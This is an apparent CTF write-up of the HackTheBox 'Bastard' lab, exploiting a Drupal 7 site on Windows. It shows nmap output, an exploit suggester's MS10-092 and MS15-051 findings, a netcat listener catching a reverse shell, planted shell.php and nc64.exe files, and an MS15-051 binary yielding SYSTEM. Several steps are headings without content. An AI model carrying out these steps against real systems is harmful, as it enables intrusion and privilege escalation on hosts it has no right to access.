Bastard HTB — WalkThrough

Initial Scans

# Nmap 7.80 scan initiated Sun Aug 16 20:40:16 2020 as: nmap -sC -sV -oA initial 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.043s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 16 20:41:23 2020 -- 1 IP address (1 host up) scanned in 67.34 seconds

Finding Exploits

ambionics

Modifying The Exploit

I couldn’t get the formatting to stay correct in the code box, sorry :)
Host Name:                 BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ££
System Boot Time: 23/8/2020, 7:02:03 §£
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.582 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.604 MB
Virtual Memory: In Use: 491 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
python -m SimpleHTTPServer

Enumeration Through the User Shell

Title      : Task Scheduler .XML                        
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Github
kali@kali:~$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.9] 49186
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\inetpub\drupal-7.5424/08/2020 02:31 �� <DIR> .
24/08/2020 02:31 �� <DIR> ..
19/03/2017 01:42 �� 317 .editorconfig
19/03/2017 01:42 �� 174 .gitignore
19/03/2017 01:42 �� 5.969 .htaccess
19/03/2017 01:42 �� 6.604 authorize.php
19/03/2017 01:42 �� 110.781 CHANGELOG.txt
19/03/2017 01:42 �� 1.481 COPYRIGHT.txt
19/03/2017 01:42 �� 720 cron.php
19/03/2017 01:43 �� <DIR> includes
19/03/2017 01:42 �� 529 index.php
19/03/2017 01:42 �� 1.717 INSTALL.mysql.txt
19/03/2017 01:42 �� 1.874 INSTALL.pgsql.txt
19/03/2017 01:42 �� 703 install.php
19/03/2017 01:42 �� 1.298 INSTALL.sqlite.txt
19/03/2017 01:42 �� 17.995 INSTALL.txt
19/03/2017 01:42 �� 18.092 LICENSE.txt
19/03/2017 01:42 �� 8.710 MAINTAINERS.txt
19/03/2017 01:43 �� <DIR> misc
19/03/2017 01:43 �� <DIR> modules
24/08/2020 02:31 �� 55.296 ms15-051x64.exe
24/08/2020 01:16 �� 43.696 nc64.exe
19/03/2017 01:43 �� <DIR> profiles
19/03/2017 01:42 �� 5.382 README.txt
19/03/2017 01:42 �� 2.189 robots.txt
24/08/2020 01:26 �� 272 s4u.php
19/03/2017 01:43 �� <DIR> scripts
24/08/2020 01:04 �� 266 shell.php
19/03/2017 01:43 �� <DIR> sites
19/03/2017 01:43 �� <DIR> themes
19/03/2017 01:42 �� 19.986 update.php
19/03/2017 01:42 �� 10.123 UPGRADE.txt
19/03/2017 01:42 �� 2.200 web.config
19/03/2017 01:42 �� 417 xmlrpc.php
25 File(s) 316.791 bytes
9 Dir(s) 30.807.846.912 bytes free
C:\inetpub\drupal-7.54>ms15-051x64.exe whoami
ms15-051x64.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 868 created.
==============================
nt authority\system
C:\inetpub\drupal-7.54>

--

--

--

Follow along as I post CTF write-ups in preparation for the OSCP!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What is ARP Poisoning & Scapy

Photochromic — Your Passport to the Metaverse

A digital future with the British Red Cross

Bridge Mutual Presents Risk Protection System for Beyond Finance

The Nine Day #Infosec Job Hunt

Why Zentry Trusted Access? Here are the top 5 reasons.

OAK Network partners with Web3Go

IcedID, IcedID baby…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Max Register

Max Register

Follow along as I post CTF write-ups in preparation for the OSCP!

More from Medium

picoCTF: Static ain’t always noise

Exatlon Walkthrough [Reverse Engineer Challenge]

Year of the Fox — TryHackMe

HackTheBox — Monitors